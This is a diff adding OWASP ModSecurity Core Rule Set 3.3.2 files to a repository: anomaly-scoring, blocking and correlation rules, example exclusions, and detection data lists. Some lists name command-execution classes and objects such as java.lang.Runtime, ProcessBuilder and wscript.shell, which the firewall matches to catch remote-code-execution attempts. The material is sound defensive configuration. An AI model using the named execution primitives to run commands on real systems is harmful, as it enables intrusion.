# it will work similarly to previous Mod CRS rules and will create an event in the error_log
# file if there are any rules that match. If you would like to lessen the number of events
# generated in the error_log file, you should increase the anomaly score threshold to
# something like "@gt 20". This would only generate an event in the error_log file if
# there are multiple lower severity rule matches or if any 1 higher severity item matches.
#
# You should also set the desired disruptive action (deny, redirect, etc...).
#
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
# Summing up the anomaly score.
# NOTE: tx.anomaly_score should not be set initially, but masking would lead to difficult bugs.
# So we add to it.
SecRule TX:PARANOIA_LEVEL "@ge 1" \
"id:959060,\
phase:4,\
pass,\
t:none,\
nolog,\
setvar:'tx.outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl1}'"
SecRule TX:PARANOIA_LEVEL "@ge 2" \
"id:959061,\
phase:4,\
pass,\
t:none,\
nolog,\
setvar:'tx.outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl2}'"
SecRule TX:PARANOIA_LEVEL "@ge 3" \
"id:959062,\
phase:4,\
pass,\
t:none,\
nolog,\
setvar:'tx.outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl3}'"
SecRule TX:PARANOIA_LEVEL "@ge 4" \
"id:959063,\
phase:4,\
pass,\
t:none,\
nolog,\
setvar:'tx.outbound_anomaly_score=+%{tx.outbound_anomaly_score_pl4}'"
# Alert and Block on High Anomaly Scores - this would block outbound data leakages
#
# Note: This rule also sets the 'tx.anomaly_score' variable.
# That variable name was formerly used in CRS, but not any longer.
# However, Jwall AuditConsole depends on this exact variable name.
# Without setting it, the 'Outbound Score' in the AuditConsole GUI would always be 0.
SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \
"id:959100,\
phase:4,\
deny,\
t:none,\
msg:'Outbound Anomaly Score Exceeded (Total Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\
tag:'anomaly-evaluation',\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.anomaly_score=+%{tx.outbound_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:959011,phase:3,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:959012,phase:4,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:959013,phase:3,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:959014,phase:4,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:959015,phase:3,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:959016,phase:4,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:959017,phase:3,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:959018,phase:4,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION"

169
core/modsecurity/files/coreruleset/rules/RESPONSE-980-CORRELATION.conf Normal file
View File

@@ -0,0 +1,169 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# This file is used in post processing after the response has been sent to
# the client (in the logging phase). Its purpose is to provide inbound+outbound
# correlation of events to provide a more intelligent designation as to the outcome
# or result of the transaction - meaning, was this a successful attack?
#
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
#
# -=[ Correlated Successful Attack ]=-
#
SecRule &TX:'/LEAKAGE\\\/ERRORS/' "@ge 1" \
"id:980100,\
phase:5,\
pass,\
t:none,\
log,\
msg:'Correlated Successful Attack Identified: (Total Score: %{tx.anomaly_score}) Inbound Attack (Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Data Leakage (Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\
tag:'event-correlation',\
ver:'OWASP_CRS/3.3.2',\
severity:'EMERGENCY',\
chain,\
skipAfter:END-CORRELATION"
SecRule &TX:'/WEB_ATTACK/' "@ge 1" "t:none"
#
# -=[ Correlated Attack Attempt ]=-
#
SecRule &TX:'/AVAILABILITY\\\/APP_NOT_AVAIL/' "@ge 1" \
"id:980110,\
phase:5,\
pass,\
t:none,\
log,\
msg:'Correlated Attack Attempt Identified: (Total Score: %{tx.anomaly_score}) Inbound Attack (Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Application Error (Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\
tag:'event-correlation',\
ver:'OWASP_CRS/3.3.2',\
severity:'ALERT',\
chain,\
skipAfter:END-CORRELATION"
SecRule &TX:'/WEB_ATTACK/' "@ge 1" "t:none"
# Creating a total sum of all triggered inbound rules, including the ones only being monitored
SecAction \
"id:980115,\
phase:5,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.executing_anomaly_score=%{tx.anomaly_score_pl1}',\
setvar:'tx.executing_anomaly_score=+%{tx.anomaly_score_pl2}',\
setvar:'tx.executing_anomaly_score=+%{tx.anomaly_score_pl3}',\
setvar:'tx.executing_anomaly_score=+%{tx.anomaly_score_pl4}'"
SecRule TX:INBOUND_ANOMALY_SCORE "@lt %{tx.inbound_anomaly_score_threshold}" \
"id:980120,\
phase:5,\
pass,\
t:none,\
log,\
noauditlog,\
msg:'Inbound Anomaly Score (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE} - SQLI=%{tx.sql_injection_score},XSS=%{tx.xss_score},RFI=%{tx.rfi_score},LFI=%{tx.lfi_score},RCE=%{tx.rce_score},PHPI=%{tx.php_injection_score},HTTP=%{tx.http_violation_score},SESS=%{tx.session_fixation_score}): individual paranoia level scores: %{TX.ANOMALY_SCORE_PL1}, %{TX.ANOMALY_SCORE_PL2}, %{TX.ANOMALY_SCORE_PL3}, %{TX.ANOMALY_SCORE_PL4}',\
tag:'event-correlation',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule TX:MONITOR_ANOMALY_SCORE "@gt 1"
SecRule TX:INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \
"id:980130,\
phase:5,\
pass,\
t:none,\
log,\
noauditlog,\
msg:'Inbound Anomaly Score Exceeded (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE} - SQLI=%{tx.sql_injection_score},XSS=%{tx.xss_score},RFI=%{tx.rfi_score},LFI=%{tx.lfi_score},RCE=%{tx.rce_score},PHPI=%{tx.php_injection_score},HTTP=%{tx.http_violation_score},SESS=%{tx.session_fixation_score}): individual paranoia level scores: %{TX.ANOMALY_SCORE_PL1}, %{TX.ANOMALY_SCORE_PL2}, %{TX.ANOMALY_SCORE_PL3}, %{TX.ANOMALY_SCORE_PL4}',\
tag:'event-correlation',\
ver:'OWASP_CRS/3.3.2'"
SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \
"id:980140,\
phase:5,\
pass,\
t:none,\
log,\
noauditlog,\
msg:'Outbound Anomaly Score Exceeded (score %{TX.OUTBOUND_ANOMALY_SCORE}): individual paranoia level scores: %{TX.OUTBOUND_ANOMALY_SCORE_PL1}, %{TX.OUTBOUND_ANOMALY_SCORE_PL2}, %{TX.OUTBOUND_ANOMALY_SCORE_PL3}, %{TX.OUTBOUND_ANOMALY_SCORE_PL4}',\
tag:'event-correlation',\
ver:'OWASP_CRS/3.3.2'"
# Creating a total sum of all triggered outbound rules, including the ones only being monitored
SecAction \
"id:980145,\
phase:5,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.executing_anomaly_score=%{tx.outbound_anomaly_score_pl1}',\
setvar:'tx.executing_anomaly_score=+%{tx.outbound_anomaly_score_pl2}',\
setvar:'tx.executing_anomaly_score=+%{tx.outbound_anomaly_score_pl3}',\
setvar:'tx.executing_anomaly_score=+%{tx.outbound_anomaly_score_pl4}'"
SecRule TX:OUTBOUND_ANOMALY_SCORE "@lt %{tx.outbound_anomaly_score_threshold}" \
"id:980150,\
phase:5,\
pass,\
t:none,\
log,\
noauditlog,\
msg:'Outbound Anomaly Score (Total Outbound Score: %{TX.OUTBOUND_ANOMALY_SCORE}): individual paranoia level scores: %{TX.OUTBOUND_ANOMALY_SCORE_PL1}, %{TX.OUTBOUND_ANOMALY_SCORE_PL2}, %{TX.OUTBOUND_ANOMALY_SCORE_PL3}, %{TX.OUTBOUND_ANOMALY_SCORE_PL4}',\
tag:'event-correlation',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule TX:MONITOR_ANOMALY_SCORE "@gt 1"
SecMarker "END-CORRELATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:980011,phase:1,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:980012,phase:2,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:980013,phase:1,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:980014,phase:2,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:980015,phase:1,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:980016,phase:2,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:980017,phase:1,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:980018,phase:2,pass,nolog,skipAfter:END-RESPONSE-980-CORRELATION"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-RESPONSE-980-CORRELATION"

75
core/modsecurity/files/coreruleset/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example Normal file
View File

@@ -0,0 +1,75 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# The purpose of this file is to hold LOCAL exceptions for your site.
# The types of rules that would go into this file are one where you want
# to unconditionally disable rules or modify their actions during startup.
#
# Please see the file REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
# for a description of the rule exclusions mechanism and the correct
# use of this file.
#
#
# Example Exclusion Rule: To unconditionally disable a rule ID
#
# ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection
# SecRuleRemoveById 942100
# Example Exclusion Rule: Remove a group of rules
#
# ModSecurity Rule Exclusion: Disable PHP injection rules
# SecRuleRemoveByTag "attack-injection-php"
#
# Example Exclusion Rule: To unconditionally remove parameter "foo" from
# inspection for SQLi rules
#
# ModSecurity Rule Exclusion: disable sqli rules for parameter foo.
# SecRuleUpdateTargetByTag "attack-sqli" "!ARGS:foo"
# -- [[ Changing the Disruptive Action for Anomaly Mode ]] --
#
# In Anomaly Mode (default in CRS3), the rules in REQUEST-949-BLOCKING-EVALUATION.conf
# and RESPONSE-959-BLOCKING-EVALUATION.conf check the accumulated attack scores
# against your policy. To apply a disruptive action, they overwrite the default
# actions specified in SecDefaultAction (setup.conf) with a 'deny' action.
# This 'deny' is by default paired with a 'status:403' action.
#
# In order to change the disruptive action from 'deny' to something else,
# you must use SecRuleUpdateActionByID directives AFTER the CRS rules
# are configured, for instance in the RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf file.
#
# These actions only apply when using Anomaly Mode.
#
# Default action: block with error 403
# (No configuration needed in this file if you want the default behavior.)
#
# Example: redirect back to the homepage on blocking
#
# SecRuleUpdateActionById 949110 "t:none,redirect:'http://%{request_headers.host}/'"
# SecRuleUpdateActionById 959100 "t:none,redirect:'http://%{request_headers.host}/'"
# Example: redirect to another URL on blocking
#
# SecRuleUpdateActionById 949110 "t:none,redirect:'http://example.com/report_problem'"
# SecRuleUpdateActionById 959100 "t:none,redirect:'http://example.com/report_problem'"
# Example: send an error 404
#
# SecRuleUpdateActionById 949110 "t:none,deny,status:404"
# SecRuleUpdateActionById 959100 "t:none,deny,status:404"
# Example: drop the connection (best for DoS attacks)
#
# SecRuleUpdateActionById 949110 "t:none,drop"
# SecRuleUpdateActionById 959100 "t:none,drop"

41
core/modsecurity/files/coreruleset/rules/crawlers-user-agents.data Normal file
View File

@@ -0,0 +1,41 @@
# Search engine crawlers and other bots
# crawler
# https://80legs.com/
80legs
# site ripper
# http://www.softbytelabs.com/en/BlackWidow/
black widow
blackwidow
# crawler
# 2006
prowebwalker
# generic crawler
pymills-spider/
# SEO
# https://ahrefs.com/robot
AhrefsBot
# people database
# https://pipl.com/bot/
PiplBot
# advertising targeting
# https://www.grapeshot.com/crawler/
GrapeshotCrawler/2.0
grapeFX
# SEO
# http://www.searchmetrics.com/searchmetricsbot/
SearchmetricsBot
# SEO
# https://www.semrush.com/bot/
SemrushBot
# SEO
# https://moz.com/help/guides/moz-procedures/what-is-rogerbot
rogerbot
# SEO
# http://www.majestic12.co.uk/projects/dsearch/mj12bot.php
MJ12bot
# news service
Owlin bot
# misbehaving spider
Lingewoud-550-Spyder
# https://www.wappalyzer.com/
Wappalyzer

13
core/modsecurity/files/coreruleset/rules/iis-errors.data Normal file
View File

@@ -0,0 +1,13 @@
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.6 - Forbidden: IP address rejected<br>
<TITLE>500 Internal Server Error</TITLE>
Microsoft VBScript runtime (0x8
error '800
Application uses a value of the wrong type for the current operation
Microsoft VBScript compilation (0x8
Microsoft VBScript compilation error
Microsoft .NET Framework Version:
A trappable error occurred in an external object. The script cannot continue running
Microsoft VBScript runtime Error
>Syntax error in string in query expression
ADODB.Command
Object required: '

43
core/modsecurity/files/coreruleset/rules/java-classes.data Normal file
View File

@@ -0,0 +1,43 @@
com.opensymphony.xwork2
com.sun.org.apache
java.io.BufferedInputStream
java.io.BufferedReader
java.io.ByteArrayInputStream
java.io.ByteArrayOutputStream
java.io.CharArrayReader
java.io.DataInputStream
java.io.File
java.io.FileOutputStream
java.io.FilePermission
java.io.FileWriter
java.io.FilterInputStream
java.io.FilterOutputStream
java.io.FilterReader
java.io.InputStream
java.io.InputStreamReader
java.io.LineNumberReader
java.io.ObjectOutputStream
java.io.OutputStream
java.io.PipedOutputStream
java.io.PipedReader
java.io.PrintStream
java.io.PushbackInputStream
java.io.Reader
java.io.StringReader
java.lang.Class
java.lang.Integer
java.lang.Number
java.lang.Object
java.lang.Process
java.lang.ProcessBuilder
java.lang.reflect
java.lang.Runtime
java.lang.String
java.lang.StringBuilder
java.lang.System
javax.script.ScriptEngineManager
org.apache.commons
org.apache.struts
org.apache.struts2
org.omg.CORBA
java.beans.XMLDecode

17
core/modsecurity/files/coreruleset/rules/java-code-leakages.data Normal file
View File

@@ -0,0 +1,17 @@
<jsp:
javax.servlet
.addheader
.createtextfile
.getfile
.loadfromfile
response.binarywrite
response.write
scripting.filesystemobject
server.createobject
server.execute
server.htmlencode
server.mappath
server.urlencode
vbscript.encode
wscript.network
wscript.shell

10
core/modsecurity/files/coreruleset/rules/java-errors.data Normal file
View File

@@ -0,0 +1,10 @@
[java.lang.
class java.lang.
java.lang.NullPointerException
java.rmi.ServerException
at java.lang.
onclick="toggle('full exception chain stacktrace')"
at org.apache.catalina
at org.apache.coyote.
at org.apache.tomcat.
at org.apache.jasper.

1115
core/modsecurity/files/coreruleset/rules/lfi-os-files.data Normal file
View File

File diff suppressed because it is too large Load Diff

276
core/modsecurity/files/coreruleset/rules/php-config-directives.data Normal file
View File

@@ -0,0 +1,276 @@
allow_call_time_pass_reference
allow_url_fopen
allow_url_include
always_populate_raw_post_data
arg_separator.input
arg_separator.output
asp_tags
assert.active
assert.bail
assert.callback
assert.quiet_eval
assert.warning
auto_append_file
auto_detect_line_endings
auto_globals_jit
auto_prepend_file
bcmath.scale
birdstep.max_links
browscap
cgi.fix_pathinfo
cgi.force_redirect
cgi.nph
cgi.redirect_status_env
cgi.rfc2616_headers
com.allow_dcom
com.autoregister_casesensitive
com.autoregister_typelib
com.autoregister_verbose
com.code_page
com.typelib_file
date.default_latitude
date.default_longitude
date.sunrise_zenith
date.sunset_zenith
date.timezone
dba.default_handler
default_charset
default_mimetype
default_socket_timeout
define_syslog_variables
disable_classes
disable_functions
display_errors
display_startup_errors
doc_root
docref_ext
docref_root
enable_dl
error_append_string
error_log
error_prepend_string
error_reporting
exif.decode_jis_intel
exif.decode_jis_motorola
exif.decode_unicode_intel
exif.decode_unicode_motorola
exif.encode_jis
exif.encode_unicode
expose_php
extension_dir
fastcgi.impersonate
fastcgi.logging
file_uploads
filter.default
filter.default_flags
gd.jpeg_ignore_warning
highlight.bg
highlight.comment
highlight.default
highlight.html
highlight.keyword
highlight.string
html_errors
ibase.allow_persistent
ibase.dateformat
ibase.default_charset
ibase.default_db
ibase.default_password
ibase.default_user
ibase.max_links
ibase.max_persistent
ibase.timeformat
ibase.timestampformat
iconv.input_encoding
iconv.internal_encoding
iconv.output_encoding
ignore_repeated_errors
ignore_repeated_source
ignore_user_abort
implicit_flush
include_path
intl.default_locale
intl.error_level
ldap.max_links
log_errors
log_errors_max_len
magic_quotes_gpc
magic_quotes_runtime
magic_quotes_sybase
mail.add_x_header
mail.force_extra_parameters
mail.log
max_execution_time
max_file_uploads
max_input_nesting_level
max_input_time
mbstring.detect_order
mbstring.encoding_translation
mbstring.func_overload
mbstring.http_input
mbstring.http_output
mbstring.http_output_conv_mimetype
mbstring.internal_encoding
mbstring.language
mbstring.script_encoding
mbstring.strict_detection
mbstring.substitute_character
mcrypt.algorithms_dir
mcrypt.modes_dir
memory_limit
mssql.allow_persistent
mssql.batchsize
mssql.charset
mssql.compatability_mode
mssql.connect_timeout
mssql.datetimeconvert
mssql.max_links
mssql.max_persistent
mssql.max_procs
mssql.min_error_severity
mssql.min_message_severity
mssql.secure_connection
mssql.textlimit
mssql.textsize
mssql.timeout
mysql.allow_local_infile
mysql.allow_persistent
mysql.cache_size
mysql.connect_timeout
mysql.default_host
mysql.default_password
mysql.default_port
mysql.default_socket
mysql.default_user
mysql.max_links
mysql.max_persistent
mysql.trace_mode
mysqli.allow_local_infile
mysqli.allow_persistent
mysqli.cache_size
mysqli.default_host
mysqli.default_port
mysqli.default_pw
mysqli.default_socket
mysqli.default_user
mysqli.max_links
mysqli.max_persistent
mysqli.reconnect
mysqlnd.collect_memory_statistics
mysqlnd.collect_statistics
mysqlnd.net_cmd_buffer_size
mysqlnd.net_read_buffer_size
oci8.connection_class
oci8.default_prefetch
oci8.events
oci8.max_persistent
oci8.old_oci_close_semantics
oci8.persistent_timeout
oci8.ping_interval
oci8.privileged_connect
oci8.statement_cache_size
odbc.allow_persistent
odbc.check_persistent
odbc.default_db
odbc.default_pw
odbc.default_user
odbc.defaultbinmode
odbc.defaultlrl
odbc.max_links
odbc.max_persistent
open_basedir
output_buffering
output_handler
pcre.backtrack_limit
pcre.recursion_limit
pdo_mysql.cache_size
pdo_mysql.default_socket
pdo_odbc.connection_pooling
pgsql.allow_persistent
pgsql.auto_reset_persistent
pgsql.ignore_notice
pgsql.log_notice
pgsql.max_links
pgsql.max_persistent
phar.cache_list
phar.readonly
phar.require_hash
post_max_size
realpath_cache_size
realpath_cache_ttl
register_argc_argv
register_globals
register_long_arrays
report_memleaks
report_zend_debug
request_order
safe_mode
safe_mode_allowed_env_vars
safe_mode_exec_dir
safe_mode_gid
safe_mode_include_dir
safe_mode_protected_env_vars
sendmail_from
sendmail_path
serialize_precision
session.auto_start
session.bug_compat_42
session.bug_compat_warn
session.cache_expire
session.cache_limiter
session.cookie_domain
session.cookie_httponly
session.cookie_lifetime
session.cookie_path
session.cookie_secure
session.entropy_file
session.entropy_length
session.gc_divisor
session.gc_maxlifetime
session.gc_probability
session.hash_bits_per_character
session.hash_function
session.name
session.referer_check
session.save_handler
session.save_path
session.serialize_handler
session.use_cookies
session.use_only_cookies
session.use_trans_sid
short_open_tag
soap.wsdl_cache_dir
soap.wsdl_cache_enabled
soap.wsdl_cache_limit
soap.wsdl_cache_ttl
sql.safe_mode
sqlite.assoc_case
sqlite3.extension_dir
sybct.allow_persistent
sybct.deadlock_retry_count
sybct.hostname
sybct.login_timeout
sybct.max_links
sybct.max_persistent
sybct.min_client_severity
sybct.min_server_severity
sybct.timeout
sysvshm.init_mem
tidy.clean_output
tidy.default_config
track_errors
unserialize_callback_func
upload_max_filesize
upload_tmp_dir
url_rewriter.tags
user_agent
user_dir
user_ini.cache_ttl
user_ini.filename
variables_order
xmlrpc_error_number
xmlrpc_errors
y2k_compliance
zlib.output_compression
zlib.output_compression_level
zlib.output_handler

219
core/modsecurity/files/coreruleset/rules/php-errors.data Normal file
View File

@@ -0,0 +1,219 @@
No row with the given identifier
open_basedir restriction in effect
eval()'d code</b> on line <b>
Cannot execute a blank command in
Fatal error</b>: preg_replace
thrown in <b>
#0 {main}
Stack trace:
</b> on line <b>
() cannot be called statically
- not a Class::Method
::__toString() must not throw an exception
Access to undeclared static property:
An iterator cannot be used with foreach by reference
Array callback has to contain indices 0 and 1
Arrived at end of main loop which shouldn't happen
Attempt to destruct pending exception
Attempt to unset static property
Balloc() allocation exceeds list boundary
Balloc() failed to allocate memory
Base lambda function for closure not found
Call to a member function
Call to private
Call to protected
Call to undefined function
Call to undefined method
Can only throw objects
Cannot access empty property
Cannot access parent:: when current class scope has no parent
Cannot access parent:: when no class scope is active
Cannot access property started with '\\0'
Cannot access self:: when no class scope is active
Cannot access static:: when no class scope is active
Cannot access undefined property for object with overloaded property access
Cannot assign by reference to overloaded object
Cannot break/continue %d level%s
Cannot call abstract method
Cannot call constructor
Cannot call forward_static_call() when no class scope is active
Cannot call non static method
Cannot call overloaded function for non-object
Cannot call private
Cannot create references to/from string offsets
Cannot create references to/from string offsets nor overloaded objects
Cannot declare self-referencing constant
Cannot destroy active lambda function
Cannot get arguments for
Cannot increment/decrement overloaded objects nor string offsets
Cannot instantiate abstract class
Cannot instantiate interface
Cannot instantiate trait
Cannot override final
Cannot pass parameter
Cannot redeclare
Cannot redeclare class
Cannot register a reverse output handler conflict outside of MINIT
Cannot register an output handler alias outside of MINIT
Cannot register an output handler conflict outside of MINIT
Cannot resume an already running generator
Cannot return string offsets by reference
Cannot set non exception as previous exception
Cannot unset string offsets
Cannot use [] for reading
Cannot use assign-op operators with overloaded objects nor string offsets
Cannot use object as array
Cannot use object of type
Cannot use string offset as an array
Cannot use string offset as an object
Cannot yield from finally in a force-closed generator
Cannot yield string offsets by reference
Class entry requested for an object without PHP class
Class name must be a valid object or a string
Corrupted fcall_info provided to zend_call_function()
DCOM has been disabled by your administrator [com.allow_dcom=0]
DateFormat class not defined
DateTimeInterface can't be implemented by user classes
EXTREMELY fatal error: jmpbuf unrecoverable; terminating
EXTREMELY fatal error: jmpbuf unrecoverable; terminating.
EXTREMELY fatal error: longjmp returned control; terminating
Encoding: '*' may only be first arraySize value in list
Encoding: Attribute
Encoding: Can't decode apache map, missing key
Encoding: Can't decode apache map, missing value
Encoding: Can't decode apache map, only Strings or Longs are allowd as keys
Encoding: Cannot find encoding
Encoding: Element
Encoding: Error calling from_xml callback
Encoding: Error calling to_xml callback
Encoding: External reference
Encoding: Internal Error
Encoding: Invalid timestamp
Encoding: SoapVar has no 'enc_type' property
Encoding: Unresolved reference
Encoding: Violation of encoding rules
Encoding: Violation of id and ref information items
Encoding: object has no '
Encoding: object has no 'any' property
Encoding: string '
Error installing signal handler for
Exception thrown without a stack frame
Exceptions must be valid objects derived from the Exception base class
Failed to clone SpoofChecker object
Failed to register IntlDateFormatter class
Failed to register MessageFormatter class
Failed to register NumberFormatter class
Failed to register ResourceBundle class
Field width %d is too long
First array member is not a valid class name or object
Function name must be a string
Illegal length modifier specified
Illegal offset type
Input string is too long
Invalid RelaxNG Validation Context
Invalid Schema Validation Context
Invalid opcode
Invalid serialization data for DatePeriod object
Invalid serialization data for DateTime object
Invalid serialization data for DateTimeImmutable object
Maximum execution time of
Method name must be a string
Need to supply an object when throwing an exception
Nesting level too deep - recursive dependency?
NumberFormatter class not defined
Object does not support method calls
Only variables can be passed by reference
PDO: driver
Parsing Schema: <restriction> or <extension> expected in complexContent
Parsing Schema: attribute
Parsing Schema: attribute has both 'ref' and 'type' attributes
Parsing Schema: attribute has both 'ref' attribute and subtype
Parsing Schema: attribute has both 'type' attribute and subtype
Parsing Schema: attribute has no 'name' nor 'ref' attributes
Parsing Schema: attributeGroup
Parsing Schema: attributeGroup has both 'ref' attribute and subattribute
Parsing Schema: attributeGroup has no 'name' nor 'ref' attributes
Parsing Schema: can't import schema from
Parsing Schema: complexType has no 'name' attribute
Parsing Schema: element has both 'default' and 'fixed' attributes
Parsing Schema: element has both 'itemType' attribute and subtype
Parsing Schema: element has both 'ref' and 'fixed' attributes
Parsing Schema: element has both 'ref' and 'nillable' attributes
Parsing Schema: element has both 'ref' and 'type' attributes
Parsing Schema: element has both 'ref' attribute and subtype
Parsing Schema: element has both 'type' attribute and subtype
Parsing Schema: element has no 'name' nor 'ref' attributes
Parsing Schema: expected <restriction> or <extension> in simpleContent
Parsing Schema: expected <restriction>, <list> or <union> in simpleType
Parsing Schema: extension has no 'base' attribute
Parsing Schema: group has both 'ref' attribute and subcontent
Parsing Schema: group has no 'name' nor 'ref' attributes
Parsing Schema: include has no 'schemaLocation' attribute
Parsing Schema: missing restriction value
Parsing Schema: redefine has no 'schemaLocation' attribute
Parsing Schema: restriction has no 'base' attribute
Parsing Schema: simpleType has no 'name' attribute
Parsing Schema: unexpected
Parsing Schema: unresolved element 'ref' attribute
Parsing Schema: unresolved group 'ref' attribute
Parsing WSDL: <binding>
Parsing WSDL: <binding> has no name attribute
Parsing WSDL: <fault> with name
Parsing WSDL: <message> has no name attribute
Parsing WSDL: <portType>
Parsing WSDL: <portType> has no name attribute
Parsing WSDL: <service>
Parsing WSDL: <service> has no name attribute
Parsing WSDL: Could not find any usable binding services in WSDL.
Parsing WSDL: Couldn't bind to service
Parsing WSDL: Couldn't find <definitions> in
Parsing WSDL: Couldn't load from
Parsing WSDL: Missing 'name' attribute for <binding>
Parsing WSDL: Missing 'name' attribute for <operation>
Parsing WSDL: Missing 'type' attribute for <binding>
Parsing WSDL: Missing <message> with name
Parsing WSDL: Missing <portType> with name
Parsing WSDL: Missing <portType>/<operation> with name
Parsing WSDL: Missing message attribute for <header>
Parsing WSDL: Missing name for <fault> of
Parsing WSDL: Missing name for <input> of
Parsing WSDL: Missing name for <output> of
Parsing WSDL: Missing part '%s' in <message>
Parsing WSDL: Missing part attribute for <header>
Parsing WSDL: No <binding> element with name
Parsing WSDL: No address associated with <port>
Parsing WSDL: No binding associated with <port>
Parsing WSDL: No location associated with <port>
Parsing WSDL: No name associated with <part>
Parsing WSDL: The fault message
Parsing WSDL: Unexpected WSDL element <
Parsing WSDL: Unexpected extensibility element <
Parsing WSDL: Unknown encodingStyle '
Parsing WSDL: Unknown required WSDL extension '
Parsing WSDL: Unspecified encodingStyle
Possible integer overflow in memory allocation (
Second array member is not a valid method
Spoofchecker class not defined
String size overflow
The object to be iterated is in an invalid state: "
Trying to clone an uncloneable object
Trying to clone an uncloneable object of class
Unable to call
Unable to cast node to string
Undefined class constant '
Undefined constant '
Undefined offset for object of type
Unexpected inconsistency in create_function()
Unknown SOAP version
Unknown typehint
Unsupported operand types
Using $this when not in object context
Wrong parameters for ErrorException(
Wrong parameters for Exception(
You MUST load PDO before loading any PDO drivers
[] operator not supported for strings
and must therefore be declared abstract or implement the remaining methods
namespace must not match the enclosing schema 'targetNamespace'
requires PDO API version
PDO Connection Error: SQLSTATE[HY000]
(HY000/2002): Connection refused

44
core/modsecurity/files/coreruleset/rules/php-function-names-933150.data Normal file
View File

@@ -0,0 +1,44 @@
__halt_compiler
